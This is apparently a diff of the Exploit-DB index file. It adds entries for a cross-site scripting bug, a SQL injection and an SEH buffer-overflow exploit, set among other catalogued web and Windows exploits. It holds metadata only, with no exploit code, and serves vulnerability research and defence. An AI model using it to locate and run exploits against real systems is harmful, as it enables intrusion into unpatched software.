 17531,exploits/php/webapps/17531.txt,"PG eLms Pro vDEC_2007_01 - 'contact_us.php' Multiple POST Cross-Site Scripting Vulnerabilities",2011-07-14,LiquidWorm,webapps,php,,2011-07-14,2011-07-14,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5027.php
@@ -32129,6 +32135,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 21269,exploits/php/webapps/21269.txt,"Webify eDownloads Cart - Arbitrary File Deletion",2012-09-12,JIKO,webapps,php,,2012-09-12,2012-09-12,0,OSVDB-85662,,,,,
 19574,exploits/php/webapps/19574.txt,"Webify Link Directory - SQL Injection",2012-07-04,"Daniel Godoy",webapps,php,,2012-07-04,2012-07-04,1,OSVDB-83688,,,,http://www.exploit-db.comWebifyLinkDirectory.zip,
 21271,exploits/php/webapps/21271.txt,"Webify Photo Gallery - Arbitrary File Deletion",2012-09-12,JIKO,webapps,php,,2012-09-12,2012-09-12,1,OSVDB-85662,,,,,
+51616,exploits/php/webapps/51616.txt,"Webile v1.0.1 - Multiple Cross Site Scripting",2023-07-20,Vulnerability-Lab,webapps,php,,2023-07-20,2023-07-20,0,,,,,,
 47199,exploits/php/webapps/47199.txt,"WebIncorp ERP - SQL injection",2019-08-01,n1x_,webapps,php,80,2019-08-01,2019-08-02,0,,"SQL Injection (SQLi)",,,,
 46350,exploits/php/webapps/46350.txt,"Webiness Inventory 2.3 - 'email' SQL Injection",2019-02-11,"Mehmet EMIROGLU",webapps,php,80,2019-02-11,2019-02-12,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comwebiness_inventory-2.3.zip,
 45843,exploits/php/webapps/45843.txt,"Webiness Inventory 2.3 - 'order' SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80,2018-11-13,2019-02-15,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comwebiness_inventory-2.3.zip,
@@ -32328,6 +32335,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 34890,exploits/php/webapps/34890.txt,"Wiccle Web Builder 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-10-21,"Veerendra G.G",webapps,php,,2010-10-21,2014-10-06,1,,,,,,https://www.securityfocus.com/bid/44295/info
 2624,exploits/php/webapps/2624.txt,"WiClear 0.10 - 'path' Remote File Inclusion",2006-10-23,"the master",webapps,php,,2006-10-22,2016-09-14,1,OSVDB-29949;CVE-2006-5506;OSVDB-29948;OSVDB-29947;OSVDB-29946;OSVDB-29945;OSVDB-29944;OSVDB-29943;OSVDB-29942,,,,http://www.exploit-db.comwiclear-0.10.tgz,
 26715,exploits/php/webapps/26715.txt,"Widget Property 1.1.19 - 'Property.php' SQL Injection",2005-11-05,r0t3d3Vil,webapps,php,,2005-11-05,2013-07-09,1,CVE-2005-4016;OSVDB-21426,,,,,https://www.securityfocus.com/bid/15701/info
+51610,exploits/php/webapps/51610.txt,"Wifi Soft Unibox Administration 3.0 & 3.1 - SQL Injection",2023-07-20,"Ansh Jain",webapps,php,,2023-07-20,2023-07-20,0,CVE-2023-34635,,,,,
 22282,exploits/php/webapps/22282.txt,"WihPhoto 0.86 dev - 'sendphoto.php' File Disclosure",2003-02-24,frog,webapps,php,,2003-02-24,2012-10-28,1,CVE-2003-1239;OSVDB-53611,,,,,https://www.securityfocus.com/bid/6929/info
 2252,exploits/php/webapps/2252.pl,"Wikepage Opus 10 < 2006.2a (lng) - Remote Command Execution",2006-08-24,Hessam-x,webapps,php,,2006-08-23,2016-09-09,1,OSVDB-28177;CVE-2006-4418,,,,http://www.exploit-db.comwikepage2006_2a.zip,
 31623,exploits/php/webapps/31623.txt,"Wikepage Opus 13 2007.2 - 'index.php' Multiple Directory Traversal Vulnerabilities",2008-04-07,A.nosrati,webapps,php,,2008-04-07,2014-02-12,1,,,,,,https://www.securityfocus.com/bid/28664/info
@@ -41178,6 +41186,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 8177,exploits/windows/local/8177.py,"RadASM 2.2.1.5 - '.rap' Local Stack Overflow",2009-03-09,zAx,local,windows,,2009-03-08,,1,OSVDB-50417,,,,,
 7334,exploits/windows/local/7334.pl,"RadASM 2.2.1.5 - '.rap' WindowCallProcA Pointer Hijack",2008-12-03,DATA_SNIPER,local,windows,,2008-12-02,,1,OSVDB-50417,,,,,
 11400,exploits/windows/local/11400.py,"RadASM 2.2.1.6 - '.rap' Universal Buffer Overflow",2010-02-11,Dz_attacker,local,windows,,2010-02-10,,1,,,,,http://www.exploit-db.comRadASM_2.2.1.6.zip,
+51611,exploits/windows/local/51611.py,"RaidenFTPD 2.4.4005 - Buffer Overflow (SEH)",2023-07-20,"Andre Nogueira",local,windows,,2023-07-20,2023-07-20,0,,,,,,
 8193,exploits/windows/local/8193.py,"RainbowPlayer 0.91 - Playlist Universal Overwrite (SEH)",2009-03-10,His0k4,local,windows,,2009-03-09,,1,OSVDB-52534,,,,,
 40145,exploits/windows/local/40145.txt,"Rapid7 AppSpider 6.12 - Local Privilege Escalation",2016-07-25,LiquidWorm,local,windows,,2016-07-25,2016-07-25,1,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5344.php
 48808,exploits/windows/local/48808.txt,"Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path",2020-09-14,LiquidWorm,local,windows,,2020-09-14,2020-09-14,0,,,,,,